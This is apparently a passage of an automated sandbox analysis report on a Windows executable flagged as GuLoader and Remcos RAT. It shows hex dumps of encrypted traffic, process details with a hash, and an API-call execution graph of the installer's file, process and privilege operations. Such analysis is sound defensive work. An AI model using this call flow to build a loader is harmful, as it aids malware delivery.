                                                                2025-01-14 14:42:21 UTC8000INData Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01
                                                                Data Ascii: T$`EfId3|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!|Ptsh;3Xofd.J>g@-vpO`\FVK$|]QA#m>$l)oORC9C_e:T
                                                                2025-01-14 14:42:21 UTC8000INData Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56
                                                                Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2*'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe* k*(g]5qUrF[P.JtgV


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:09:39:57
                                                                Start date:14/01/2025
                                                                Path:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\x6yDsHJ9tr.exe"
                                                                Imagebase:0x400000
                                                                File size:550'217 bytes
                                                                MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3373583635.0000000006C89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:09:42:05
                                                                Start date:14/01/2025
                                                                Path:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\x6yDsHJ9tr.exe"
                                                                Imagebase:0x400000
                                                                File size:550'217 bytes
                                                                MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:15.7%
                                                                  Dynamic/Decrypted Code Coverage:13.4%
                                                                  Signature Coverage:15.9%
                                                                  Total number of Nodes:1606
                                                                  Total number of Limit Nodes:33
                                                                  execution_graph 5197 4047c0 5198 4047d8 5197->5198 5202 4048f2 5197->5202 5228 404601 5198->5228 5199 40495c 5200 404a26 5199->5200 5201 404966 GetDlgItem 5199->5201 5240 404668 5200->5240 5204 4049e7 5201->5204 5208 404980 5201->5208 5202->5199 5202->5200 5205 40492d GetDlgItem SendMessageW 5202->5205 5204->5200 5213 4049f9 5204->5213 5233 404623 EnableWindow 5205->5233 5206 40483f 5210 404601 22 API calls 5206->5210 5208->5204 5212 4049a6 SendMessageW LoadCursorW SetCursor 5208->5212 5215 40484c CheckDlgButton 5210->5215 5211 404a21 5237 404a6f 5212->5237 5217 404a0f 5213->5217 5218 4049ff SendMessageW 5213->5218 5214 404957 5234 404a4b 5214->5234 5231 404623 EnableWindow 5215->5231 5217->5211 5219 404a15 SendMessageW 5217->5219 5218->5217 5219->5211 5223 40486a GetDlgItem 5232 404636 SendMessageW 5223->5232 5225 404880 SendMessageW 5226 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5225->5226 5227 40489d GetSysColor 5225->5227 5226->5211 5227->5226 5229 4066bf 21 API calls 5228->5229 5230 40460c SetDlgItemTextW 5229->5230 5230->5206 5231->5223 5232->5225 5233->5214 5235 404a59 5234->5235 5236 404a5e SendMessageW 5234->5236 5235->5236 5236->5199 5254 405ca8 ShellExecuteExW 5237->5254 5239 4049d5 LoadCursorW SetCursor 5239->5204 5241 40472b 5240->5241 5242 404680 GetWindowLongW 5240->5242 5241->5211 5242->5241 5243 404695 5242->5243 5243->5241 5244 4046c2 GetSysColor 5243->5244 5245 4046c5 5243->5245 5244->5245 5246 4046d5 SetBkMode 5245->5246 5247 4046cb SetTextColor 5245->5247 5248 4046f3 5246->5248 5249 4046ed GetSysColor 5246->5249 5247->5246 5250 404704 5248->5250 5251 4046fa SetBkColor 5248->5251 5249->5248 5250->5241 5252 404717 DeleteObject 5250->5252 5253 40471e CreateBrushIndirect 5250->5253 5251->5250 5252->5253 5253->5241 5254->5239 5255 402643 5256 402672 5255->5256 5257 402657 5255->5257 5259 4026a2 5256->5259 5260 402677 5256->5260 5258 402d89 21 API calls 5257->5258 5268 40265e 5258->5268 5262 402dab 21 API calls 5259->5262 5261 402dab 21 API calls 5260->5261 5264 40267e 5261->5264 5263 4026a9 lstrlenW 5262->5263 5263->5268 5272 4066a4 WideCharToMultiByte 5264->5272 5266 402692 lstrlenA 5266->5268 5267 4026ec 5268->5267 5270 406253 5 API calls 5268->5270 5271 4026d6 5268->5271 5269 406224 WriteFile 5269->5267 5270->5271 5271->5267 5271->5269 5272->5266 5273 73472d43 5274 73472d5b 5273->5274 5275 7347162f 2 API calls 5274->5275 5276 73472d76 5275->5276 4322 403645 SetErrorMode GetVersionExW 4323 4036d1 4322->4323 4324 403699 GetVersionExW 4322->4324 4325 403728 4323->4325 4326 406a76 5 API calls 4323->4326 4324->4323 4327 406a06 3 API calls 4325->4327 4326->4325 4328 40373e lstrlenA 4327->4328 4328->4325 4329 40374e 4328->4329 4330 406a76 5 API calls 4329->4330 4331 403755 4330->4331 4332 406a76 5 API calls 4331->4332 4333 40375c 4332->4333 4334 406a76 5 API calls 4333->4334 4335 403768 #17 OleInitialize SHGetFileInfoW 4334->4335 4410 406682 lstrcpynW 4335->4410 4338 4037b7 GetCommandLineW 4411 406682 lstrcpynW 4338->4411 4340 4037c9 4341 405f7e CharNextW 4340->4341 4342 4037ef CharNextW 4341->4342 4348 403801 4342->4348 4343 403903 4344 403917 GetTempPathW 4343->4344 4412 403614 4344->4412 4346 40392f 4349 403933 GetWindowsDirectoryW lstrcatW 4346->4349 4350 403989 DeleteFileW 4346->4350 4347 405f7e CharNextW 4347->4348 4348->4343 4348->4347 4355 403905 4348->4355 4352 403614 12 API calls 4349->4352 4422 4030d5 GetTickCount GetModuleFileNameW 4350->4422 4353 40394f 4352->4353 4353->4350 4354 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4353->4354 4358 403614 12 API calls 4354->4358 4509 406682 lstrcpynW 4355->4509 4356 403a54 4586 403c62 4356->4586 4357 40399d 4357->4356 4360 403a44 4357->4360 4364 405f7e CharNextW 4357->4364 4362 403981 4358->4362 4452 403d54 4360->4452 4362->4350 4362->4356 4379 4039bc 4364->4379 4366 403ba2 4595 405ce2 4366->4595 4367 403bc6 4369 403c4a ExitProcess 4367->4369 4370 403bce GetCurrentProcess OpenProcessToken 4367->4370 4375 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 4370->4375 4376 403c1a 4370->4376 4371 403a1a 4510 406059 4371->4510 4372 403a5d 4526 405c4d 4372->4526 4375->4376 4380 406a76 5 API calls 4376->4380 4379->4371 4379->4372 4381 403c21 4380->4381 4384 403c36 ExitWindowsEx 4381->4384 4387 403c43 4381->4387 4384->4369 4384->4387 4386 403a7c 4389 403a94 4386->4389 4530 406682 lstrcpynW 4386->4530 4599 40140b 4387->4599 4394 403aba wsprintfW 4389->4394 4407 403ae6 4389->4407 4391 403a39 4525 406682 lstrcpynW 4391->4525 4395 4066bf 21 API calls 4394->4395 4395->4389 4398 403b30 SetCurrentDirectoryW 4576 406442 MoveFileExW 4398->4576 4399 403af6 GetFileAttributesW 4401 403b02 DeleteFileW 4399->4401 4399->4407 4401->4407 4404 406442 40 API calls 4404->4407 4405 4066bf 21 API calls 4405->4407 4407->4356 4407->4389 4407->4394 4407->4398 4407->4399 4407->4404 4407->4405 4408 403bb8 CloseHandle 4407->4408 4531 405bd6 CreateDirectoryW 4407->4531 4534 405c30 CreateDirectoryW 4407->4534 4537 405d8e 4407->4537 4580 405c65 CreateProcessW 4407->4580 4583 4069df FindFirstFileW 4407->4583 4408->4356 4410->4338 4411->4340 4413 406930 5 API calls 4412->4413 4415 403620 4413->4415 4414 40362a 4414->4346 4415->4414 4602 405f51 lstrlenW CharPrevW 4415->4602 4418 405c30 2 API calls 4419 403638 4418->4419 4420 4061a1 2 API calls 4419->4420 4421 403643 4420->4421 4421->4346 4605 406172 GetFileAttributesW CreateFileW 4422->4605 4424 403118 4451 403125 4424->4451 4606 406682 lstrcpynW 4424->4606 4426 40313b 4607 405f9d lstrlenW 4426->4607 4430 40314c GetFileSize 4431 403246 4430->4431 4443 403163 4430->4443 4612 403033 4431->4612 4435 40328b GlobalAlloc 4438 4032a2 4435->4438 4437 4032e3 4439 403033 36 API calls 4437->4439 4441 4061a1 2 API calls 4438->4441 4439->4451 4440 40326c 4442 4035e7 ReadFile 4440->4442 4444 4032b3 CreateFileW 4441->4444 4445 403277 4442->4445 4443->4431 4443->4437 4446 403033 36 API calls 4443->4446 4443->4451 4643 4035e7 4443->4643 4447 4032ed 4444->4447 4444->4451 4445->4435 4445->4451 4446->4443 4627 4035fd SetFilePointer 4447->4627 4449 4032fb 4628 403376 4449->4628 4451->4357 4453 406a76 5 API calls 4452->4453 4454 403d68 4453->4454 4455 403d80 4454->4455 4456 403d6e 4454->4456 4457 406550 3 API calls 4455->4457 4698 4065c9 wsprintfW 4456->4698 4458 403db0 4457->4458 4460 403dcf lstrcatW 4458->4460 4461 406550 3 API calls 4458->4461 4462 403d7e 4460->4462 4461->4460 4690 40402a 4462->4690 4465 406059 18 API calls 4466 403e01 4465->4466 4467 403e95 4466->4467 4469 406550 3 API calls 4466->4469 4468 406059 18 API calls 4467->4468 4470 403e9b 4468->4470 4471 403e33 4469->4471 4472 403eab LoadImageW 4470->4472 4473 4066bf 21 API calls 4470->4473 4471->4467 4478 403e54 lstrlenW 4471->4478 4482 405f7e CharNextW 4471->4482 4474 403f51 4472->4474 4475 403ed2 RegisterClassW 4472->4475 4473->4472 4477 40140b 2 API calls 4474->4477 4476 403f08 SystemParametersInfoW CreateWindowExW 4475->4476 4484 403f5b 4475->4484 4476->4474 4481 403f57 4477->4481 4479 403e62 lstrcmpiW 4478->4479 4480 403e88 4478->4480 4479->4480 4483 403e72 GetFileAttributesW 4479->4483 4485 405f51 3 API calls 4480->4485 4481->4484 4488 40402a 22 API calls 4481->4488 4486 403e51 4482->4486 4487 403e7e 4483->4487 4484->4356 4489 403e8e 4485->4489 4486->4478 4487->4480 4490 405f9d 2 API calls 4487->4490 4491 403f68 4488->4491 4699 406682 lstrcpynW 4489->4699 4490->4480 4493 403f74 ShowWindow 4491->4493 4494 403ff7 4491->4494 4496 406a06 3 API calls 4493->4496 4700 4057da OleInitialize 4494->4700 4498 403f8c 4496->4498 4497 403ffd 4499 404001 4497->4499 4500 404019 4497->4500 4501 403f9a GetClassInfoW 4498->4501 4503 406a06 3 API calls 4498->4503 4499->4484 4507 40140b 2 API calls 4499->4507 4502 40140b 2 API calls 4500->4502 4504 403fc4 DialogBoxParamW 4501->4504 4505 403fae GetClassInfoW RegisterClassW 4501->4505 4502->4484 4503->4501 4506 40140b 2 API calls 4504->4506 4505->4504 4508 403fec 4506->4508 4507->4484 4508->4484 4509->4344 4718 406682 lstrcpynW 4510->4718 4512 40606a 4719 405ffc CharNextW CharNextW 4512->4719 4515 403a26 4515->4356 4524 406682 lstrcpynW 4515->4524 4516 406930 5 API calls 4522 406080 4516->4522 4517 4060b1 lstrlenW 4518 4060bc 4517->4518 4517->4522 4520 405f51 3 API calls 4518->4520 4519 4069df 2 API calls 4519->4522 4521 4060c1 GetFileAttributesW 4520->4521 4521->4515 4522->4515 4522->4517 4522->4519 4523 405f9d 2 API calls 4522->4523 4523->4517 4524->4391 4525->4360 4527 406a76 5 API calls 4526->4527 4528 403a62 lstrlenW 4527->4528 4529 406682 lstrcpynW 4528->4529 4529->4386 4530->4389 4532 405c22 4531->4532 4533 405c26 GetLastError 4531->4533 4532->4407 4533->4532 4535 405c40 4534->4535 4536 405c44 GetLastError 4534->4536 4535->4407 4536->4535 4538 406059 18 API calls 4537->4538 4539 405dae 4538->4539 4540 405db6 DeleteFileW 4539->4540 4541 405dcd 4539->4541 4546 405f04 4540->4546 4547 405ef8 4541->4547 4725 406682 lstrcpynW 4541->4725 4543 405df3 4544 405e06 4543->4544 4545 405df9 lstrcatW 4543->4545 4550 405f9d 2 API calls 4544->4550 4549 405e0c 4545->4549 4546->4407 4547->4546 4548 4069df 2 API calls 4547->4548 4551 405f12 4548->4551 4552 405e1c lstrcatW 4549->4552 4553 405e27 lstrlenW FindFirstFileW 4549->4553 4550->4549 4551->4546 4554 405f16 4551->4554 4552->4553 4555 405eed 4553->4555 4574 405e49 4553->4574 4556 405f51 3 API calls 4554->4556 4555->4547 4557 405f1c 4556->4557 4559 405d46 5 API calls 4557->4559 4558 405ed0 FindNextFileW 4562 405ee6 FindClose 4558->4562 4558->4574 4561 405f28 4559->4561 4563 405f42 4561->4563 4564 405f2c 4561->4564 4562->4555 4566 405707 28 API calls 4563->4566 4564->4546 4567 405707 28 API calls 4564->4567 4566->4546 4569 405f39 4567->4569 4568 405d8e 64 API calls 4568->4574 4571 406442 40 API calls 4569->4571 4570 405707 28 API calls 4570->4558 4573 405f40 4571->4573 4572 405707 28 API calls 4572->4574 4573->4546 4574->4558 4574->4568 4574->4570 4574->4572 4575 406442 40 API calls 4574->4575 4726 406682 lstrcpynW 4574->4726 4727 405d46 4574->4727 4575->4574 4577 403b3f CopyFileW 4576->4577 4578 406456 4576->4578 4577->4356 4577->4407 4738 4062c8 4578->4738 4581 405ca4 4580->4581 4582 405c98 CloseHandle 4580->4582 4581->4407 4582->4581 4584 406a00 4583->4584 4585 4069f5 FindClose 4583->4585 4584->4407 4585->4584 4587 403c73 CloseHandle 4586->4587 4588 403c7d 4586->4588 4587->4588 4589 403c91 4588->4589 4590 403c87 CloseHandle 4588->4590 4772 403cbf 4589->4772 4590->4589 4593 405d8e 71 API calls 4594 403b95 OleUninitialize 4593->4594 4594->4366 4594->4367 4596 405cf7 4595->4596 4597 403bb0 ExitProcess 4596->4597 4598 405d0b MessageBoxIndirectW 4596->4598 4598->4597 4600 401389 2 API calls 4599->4600 4601 401420 4600->4601 4601->4369 4603 403632 4602->4603 4604 405f6d lstrcatW 4602->4604 4603->4418 4604->4603 4605->4424 4606->4426 4608 405fab 4607->4608 4609 405fb1 CharPrevW 4608->4609 4610 403141 4608->4610 4609->4608 4609->4610 4611 406682 lstrcpynW 4610->4611 4611->4430 4613 403044 4612->4613 4614 40305c 4612->4614 4615 40304d DestroyWindow 4613->4615 4622 403054 4613->4622 4616 403064 4614->4616 4617 40306c GetTickCount 4614->4617 4615->4622 4647 406ab2 4616->4647 4619 40307a 4617->4619 4617->4622 4620 403082 4619->4620 4621 4030af CreateDialogParamW ShowWindow 4619->4621 4620->4622 4651 403017 4620->4651 4621->4622 4622->4435 4622->4451 4646 4035fd SetFilePointer 4622->4646 4624 403090 wsprintfW 4654 405707 4624->4654 4627->4449 4629 4033a1 4628->4629 4630 403385 SetFilePointer 4628->4630 4665 40347e GetTickCount 4629->4665 4630->4629 4633 40343e 4633->4451 4636 40347e 46 API calls 4637 4033d8 4636->4637 4637->4633 4638 403444 ReadFile 4637->4638 4640 4033e7 4637->4640 4638->4633 4640->4633 4641 4061f5 ReadFile 4640->4641 4680 406224 WriteFile 4640->4680 4641->4640 4644 4061f5 ReadFile 4643->4644 4645 4035fa 4644->4645 4645->4443 4646->4440 4648 406acf PeekMessageW 4647->4648 4649 406ac5 DispatchMessageW 4648->4649 4650 406adf 4648->4650 4649->4648 4650->4622 4652 403026 4651->4652 4653 403028 MulDiv 4651->4653 4652->4653 4653->4624 4655 405722 4654->4655 4664 4030ad 4654->4664 4656 40573e lstrlenW 4655->4656 4657 4066bf 21 API calls 4655->4657 4658 405767 4656->4658 4659 40574c lstrlenW 4656->4659 4657->4656 4660 40577a 4658->4660 4661 40576d SetWindowTextW 4658->4661 4662 40575e lstrcatW 4659->4662 4659->4664 4663 405780 SendMessageW SendMessageW SendMessageW 4660->4663 4660->4664 4661->4660 4662->4658 4663->4664 4664->4622 4666 4035d6 4665->4666 4667 4034ac 4665->4667 4668 403033 36 API calls 4666->4668 4682 4035fd SetFilePointer 4667->4682 4675 4033a8 4668->4675 4670 4034b7 SetFilePointer 4674 4034dc 4670->4674 4671 4035e7 ReadFile 4671->4674 4673 403033 36 API calls 4673->4674 4674->4671 4674->4673 4674->4675 4676 406224 WriteFile 4674->4676 4677 4035b7 SetFilePointer 4674->4677 4683 406bf1 4674->4683 4675->4633 4678 4061f5 ReadFile 4675->4678 4676->4674 4677->4666 4679 4033c1 4678->4679 4679->4633 4679->4636 4681 406242 4680->4681 4681->4640 4682->4670 4684 406c16 4683->4684 4687 406c1e 4683->4687 4684->4674 4685 406ca5 GlobalFree 4686 406cae GlobalAlloc 4685->4686 4686->4684 4686->4687 4687->4684 4687->4685 4687->4686 4688 406d25 GlobalAlloc 4687->4688 4689 406d1c GlobalFree 4687->4689 4688->4684 4688->4687 4689->4688 4691 40403e 4690->4691 4707 4065c9 wsprintfW 4691->4707 4693 4040af 4708 4040e3 4693->4708 4695 403ddf 4695->4465 4696 4040b4 4696->4695 4697 4066bf 21 API calls 4696->4697 4697->4696 4698->4462 4699->4467 4711 40464d 4700->4711 4702 405824 4703 40464d SendMessageW 4702->4703 4705 405836 OleUninitialize 4703->4705 4704 4057fd 4704->4702 4714 401389 4704->4714 4705->4497 4707->4693 4709 4066bf 21 API calls 4708->4709 4710 4040f1 SetWindowTextW 4709->4710 4710->4696 4712 404665 4711->4712 4713 404656 SendMessageW 4711->4713 4712->4704 4713->4712 4716 401390 4714->4716 4715 4013fe 4715->4704 4716->4715 4717 4013cb MulDiv SendMessageW 4716->4717 4717->4716 4718->4512 4720 406019 4719->4720 4723 40602b 4719->4723 4722 406026 CharNextW 4720->4722 4720->4723 4721 40604f 4721->4515 4721->4516 4722->4721 4723->4721 4724 405f7e CharNextW 4723->4724 4724->4723 4725->4543 4726->4574 4735 40614d GetFileAttributesW 4727->4735 4730 405d73 4730->4574 4731 405d61 RemoveDirectoryW 4733 405d6f 4731->4733 4732 405d69 DeleteFileW 4732->4733 4733->4730 4734 405d7f SetFileAttributesW 4733->4734 4734->4730 4736 405d52 4735->4736 4737 40615f SetFileAttributesW 4735->4737 4736->4730 4736->4731 4736->4732 4737->4736 4739 4062f8 4738->4739 4740 40631e GetShortPathNameW 4738->4740 4765 406172 GetFileAttributesW CreateFileW 4739->4765 4742 406333 4740->4742 4743 40643d 4740->4743 4742->4743 4745 40633b wsprintfA 4742->4745 4743->4577 4744 406302 CloseHandle GetShortPathNameW 4744->4743 4746 406316 4744->4746 4747 4066bf 21 API calls 4745->4747 4746->4740 4746->4743 4748 406363 4747->4748 4766 406172 GetFileAttributesW CreateFileW 4748->4766 4750 406370 4750->4743 4751 40637f GetFileSize GlobalAlloc 4750->4751 4752 4063a1 4751->4752 4753 406436 CloseHandle 4751->4753 4754 4061f5 ReadFile 4752->4754 4753->4743 4755 4063a9 4754->4755 4755->4753 4767 4060d7 lstrlenA 4755->4767 4758 4063c0 lstrcpyA 4760 4063e2 4758->4760 4759 4063d4 4761 4060d7 4 API calls 4759->4761 4762 406419 SetFilePointer 4760->4762 4761->4760 4763 406224 WriteFile 4762->4763 4764 40642f GlobalFree 4763->4764 4764->4753 4765->4744 4766->4750 4768 406118 lstrlenA 4767->4768 4769 4060f1 lstrcmpiA 4768->4769 4770 406120 4768->4770 4769->4770 4771 40610f CharNextA 4769->4771 4770->4758 4770->4759 4771->4768 4773 403ccd 4772->4773 4774 403c96 4773->4774 4775 403cd2 FreeLibrary GlobalFree 4773->4775 4774->4593 4775->4774 4775->4775 4782 4015c6 4783 402dab 21 API calls 4782->4783 4784 4015cd 4783->4784 4785 405ffc 4 API calls 4784->4785 4798 4015d6 4785->4798 4786 401636 4787 401668 4786->4787 4788 40163b 4786->4788 4792 401423 28 API calls 4787->4792 4801 401423 4788->4801 4789 405f7e CharNextW 4789->4798 4797 401660 4792->4797 4794 405c30 2 API calls 4794->4798 4795 405c4d 5 API calls 4795->4798 4796 40164f SetCurrentDirectoryW 4796->4797 4798->4786 4798->4789 4798->4794 4798->4795 4799 40161c GetFileAttributesW 4798->4799 4800 405bd6 2 API calls 4798->4800 4799->4798 4800->4798 4802 405707 28 API calls 4801->4802 4803 401431 4802->4803 4804 406682 lstrcpynW 4803->4804 4804->4796 5277 405846 5278 4059f0 5277->5278 5279 405867 GetDlgItem GetDlgItem GetDlgItem 5277->5279 5281 405a21 5278->5281 5282 4059f9 GetDlgItem CreateThread CloseHandle 5278->5282 5322 404636 SendMessageW 5279->5322 5284 405a4c 5281->5284 5285 405a71 5281->5285 5286 405a38 ShowWindow ShowWindow 5281->5286 5282->5281 5283 4058d7 5288 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 5283->5288 5287 405aac 5284->5287 5290 405a60 5284->5290 5291 405a86 ShowWindow 5284->5291 5292 404668 8 API calls 5285->5292 5324 404636 SendMessageW 5286->5324 5287->5285 5298 405aba SendMessageW 5287->5298 5296 405930 SendMessageW SendMessageW 5288->5296 5297 40594c 5288->5297 5325 4045da 5290->5325 5294 405aa6 5291->5294 5295 405a98 5291->5295 5293 405a7f 5292->5293 5301 4045da SendMessageW 5294->5301 5300 405707 28 API calls 5295->5300 5296->5297 5302 405951 SendMessageW 5297->5302 5303 40595f 5297->5303 5298->5293 5304 405ad3 CreatePopupMenu 5298->5304 5300->5294 5301->5287 5302->5303 5306 404601 22 API calls 5303->5306 5305 4066bf 21 API calls 5304->5305 5307 405ae3 AppendMenuW 5305->5307 5308 40596f 5306->5308 5309 405b00 GetWindowRect 5307->5309 5310 405b13 TrackPopupMenu 5307->5310 5311 405978 ShowWindow 5308->5311 5312 4059ac GetDlgItem SendMessageW 5308->5312 5309->5310 5310->5293 5314 405b2e 5310->5314 5315 40599b 5311->5315 5316 40598e ShowWindow 5311->5316 5312->5293 5313 4059d3 SendMessageW SendMessageW 5312->5313 5313->5293 5317 405b4a SendMessageW 5314->5317 5323 404636 SendMessageW 5315->5323 5316->5315 5317->5317 5318 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5317->5318 5320 405b8c SendMessageW 5318->5320 5320->5320 5321 405bb5 GlobalUnlock SetClipboardData CloseClipboard 5320->5321 5321->5293 5322->5283 5323->5312 5324->5284 5326 4045e1 5325->5326 5327 4045e7 SendMessageW 5325->5327 5326->5327 5327->5285 4805 401c48 4806 402d89 21 API calls 4805->4806 4807 401c4f 4806->4807 4808 402d89 21 API calls 4807->4808 4809 401c5c 4808->4809 4810 401c71 4809->4810 4811 402dab 21 API calls 4809->4811 4814 402dab 21 API calls 4810->4814 4817 401c81 4810->4817 4811->4810 4812 401cd8 4816 402dab 21 API calls 4812->4816 4813 401c8c 4815 402d89 21 API calls 4813->4815 4814->4817 4818 401c91 4815->4818 4819 401cdd 4816->4819 4817->4812 4817->4813 4820 402d89 21 API calls 4818->4820 4821 402dab 21 API calls 4819->4821 4822 401c9d 4820->4822 4823 401ce6 FindWindowExW 4821->4823 4824 401cc8 SendMessageW 4822->4824 4825 401caa SendMessageTimeoutW 4822->4825 4826 401d08 4823->4826 4824->4826 4825->4826 5328 404e48 5329 404e74 5328->5329 5330 404e58 5328->5330 5332 404ea7 5329->5332 5333 404e7a SHGetPathFromIDListW 5329->5333 5339 405cc6 GetDlgItemTextW 5330->5339 5335 404e91 SendMessageW 5333->5335 5336 404e8a 5333->5336 5334 404e65 SendMessageW 5334->5329 5335->5332 5337 40140b 2 API calls 5336->5337 5337->5335 5339->5334 5340 4028c9 5341 4028cf 5340->5341 5342 4028d7 FindClose 5341->5342 5343 402c2f 5341->5343 5342->5343 5347 4016d1 5348 402dab 21 API calls 5347->5348 5349 4016d7 GetFullPathNameW 5348->5349 5350 4016f1 5349->5350 5356 401713 5349->5356 5353 4069df 2 API calls 5350->5353 5350->5356 5351 401728 GetShortPathNameW 5352 402c2f 5351->5352 5354 401703 5353->5354 5354->5356 5357 406682 lstrcpynW 5354->5357 5356->5351 5356->5352 5357->5356 5358 401e53 GetDC 5359 402d89 21 API calls 5358->5359 5360 401e65 GetDeviceCaps MulDiv ReleaseDC 5359->5360 5361 402d89 21 API calls 5360->5361 5362 401e96 5361->5362 5363 4066bf 21 API calls 5362->5363 5364 401ed3 CreateFontIndirectW 5363->5364 5365 40263d 5364->5365 5366 402955 5367 402dab 21 API calls 5366->5367 5368 402961 5367->5368 5369 402977 5368->5369 5370 402dab 21 API calls 5368->5370 5371 40614d 2 API calls 5369->5371 5370->5369 5372 40297d 5371->5372 5394 406172 GetFileAttributesW CreateFileW 5372->5394 5374 40298a 5375 402a40 5374->5375 5378 4029a5 GlobalAlloc 5374->5378 5379 402a28 5374->5379 5376 402a47 DeleteFileW 5375->5376 5377 402a5a 5375->5377 5376->5377 5378->5379 5380 4029be 5378->5380 5381 403376 48 API calls 5379->5381 5395 4035fd SetFilePointer 5380->5395 5383 402a35 CloseHandle 5381->5383 5383->5375 5384 4029c4 5385 4035e7 ReadFile 5384->5385 5386 4029cd GlobalAlloc 5385->5386 5387 402a11 5386->5387 5388 4029dd 5386->5388 5390 406224 WriteFile 5387->5390 5389 403376 48 API calls 5388->5389 5393 4029ea 5389->5393 5391 402a1d GlobalFree 5390->5391 5391->5379 5392 402a08 GlobalFree 5392->5387 5393->5392 5394->5374 5395->5384 5410 4014d7 5411 402d89 21 API calls 5410->5411 5412 4014dd Sleep 5411->5412 5414 402c2f 5412->5414 5415 40195b 5416 402dab 21 API calls 5415->5416 5417 401962 lstrlenW 5416->5417 5418 40263d 5417->5418 5003 4020dd 5004 4021a1 5003->5004 5005 4020ef 5003->5005 5007 401423 28 API calls 5004->5007 5006 402dab 21 API calls 5005->5006 5008 4020f6 5006->5008 5013 4022fb 5007->5013 5009 402dab 21 API calls 5008->5009 5010 4020ff 5009->5010 5011 402115 LoadLibraryExW 5010->5011 5012 402107 GetModuleHandleW 5010->5012 5011->5004 5014 402126 5011->5014 5012->5011 5012->5014 5026 406ae5 5014->5026 5017 402170 5019 405707 28 API calls 5017->5019 5018 402137 5020 402156 5018->5020 5021 40213f 5018->5021 5023 402147 5019->5023 5031 73471817 5020->5031 5022 401423 28 API calls 5021->5022 5022->5023 5023->5013 5024 402193 FreeLibrary 5023->5024 5024->5013 5073 4066a4 WideCharToMultiByte 5026->5073 5028 406b02 5029 406b09 GetProcAddress 5028->5029 5030 402131 5028->5030 5029->5030 5030->5017 5030->5018 5032 